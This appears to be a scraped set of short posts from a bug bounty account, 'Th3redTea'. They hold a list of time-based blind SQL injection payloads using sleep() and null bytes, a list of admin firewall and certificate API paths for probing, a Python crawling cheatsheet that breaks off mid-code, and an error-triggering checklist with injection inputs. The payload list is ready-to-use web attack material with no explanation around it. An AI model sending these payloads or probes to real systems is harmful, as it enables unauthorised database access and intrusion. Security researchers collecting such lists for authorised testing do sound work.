Th3redTea

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z%00
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z%00
if(now()=sysdate(),sleep(5),0)%00
'XOR(if(now()=sysdate(),sleep(5),0))XOR'%00
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'%00
0'|(IF((now())LIKE(sysdate()),SLEEP(5),0))|'Z%00
0'or(now()=sysdate()&&SLEEP(1))or'Z%00
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/%00
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/%00
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/%00

Th3redTea

/api/admin/certificates
/api/admin/firewall
/api/admin/firewall/rules/1
/api/admin/firewall/rules/10
/api/admin/firewall/rules/2
/api/admin/firewall/rules/3
/api/admin/firewall/rules/4
/api/admin/firewall/rules/5
/api/admin/firewall/rules/6
/api/admin/firewall/rules/7

Th3redTea

🐍 Python Crawling Libraries Cheatsheet

---

Library: requests

Use case: Fetch a single page and inspect its HTML.

import requests

# Send a GET request to a page

Th3redTea

#Triggering Errors:

🕵️ Bug Bounty Error Triggering Checklist

1. Input Manipulation

• Send wrong types: strings where ints expected (id=abc instead of id=123).
• Overflow values: id=9999999999999999999.
• Null byte injection: id=123%00.png.
• Extremely long values (10k chars) in text fields.
• Special characters: ';--<>${}.